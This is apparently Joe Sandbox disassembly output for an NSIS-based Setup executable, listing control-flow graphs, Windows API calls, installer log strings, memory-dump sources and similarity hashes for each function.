control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
APIs
• GetTickCount.KERNEL32 ref: 004035C4
• GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
• GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
Strings
• Null, xrefs: 004036AA
• soft, xrefs: 004036A1
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
• Inst, xrefs: 00403698
• Error launching installer, xrefs: 00403603
Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 4283519449-527102705
• Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
• Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
• Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
• Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Control-flow Graph

control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
APIs
• GetTickCount.KERNEL32 ref: 004033F1
• GetTickCount.KERNEL32 ref: 00403492
• MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
• wsprintfW.USER32 ref: 004034CE
• WriteFile.KERNELBASE(00000000,00000000,00424179,00403792,00000000), ref: 004034FF
• WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
Strings
Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: CountFileTickWrite$wsprintf
• String ID: (]C$... %d%%$pAB$yAB
• API String ID: 651206458-2023174797
• Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
• Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
• Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
• Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Control-flow Graph

control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
APIs
• lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
• lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
• lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
• SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
• SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
• String ID:
• API String ID: 2740478559-0
• Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
• Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
• Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
• Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Control-flow Graph

control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                  APIs
                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                  • GlobalFree.KERNELBASE(00646238), ref: 00402387
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Similarity
                                                                  • API ID: FreeGloballstrcpyn
                                                                  • String ID: 8bd$CanPoland$Exch: stack < %d elements$Pop: stack empty

                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                  • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                  • GlobalFree.KERNELBASE(00646238), ref: 00402387
                                                                  Similarity
                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                  • String ID:

                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                  • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                  • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                  Similarity
                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                  • String ID:

                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                  APIs
                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                  • String ID: <RM>$CanPoland$WriteINIStr: wrote [%s] %s=%s in %s

                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                  APIs
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                  Similarity
                                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d

                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405EC9
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: nsa
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                  • String ID: HideWindow
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  APIs
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                  • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                  • String ID:
                                                                  • API String ID: 4115351271-0
                                                                  APIs
                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                  • DeleteObject.GDI32(?), ref: 00404AA5
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                  • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                  • ShowWindow.USER32(00000000), ref: 00404F87
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $ @$M$N
                                                                  • API String ID: 1638840714-3479655940
                                                                  • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                  • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                  • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                  • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                  APIs
                                                                  • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                  • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                  • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                  • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                  • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                  • FindClose.KERNEL32(?), ref: 00406E5F
                                                                  Strings
                                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                  • ptF, xrefs: 00406D1A
                                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                  • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                  • \*.*, xrefs: 00406D2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                  • API String ID: 2035342205-1650287579
                                                                  • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                  • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                  • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                  • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                  • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                  • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                  • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                  • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                    • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
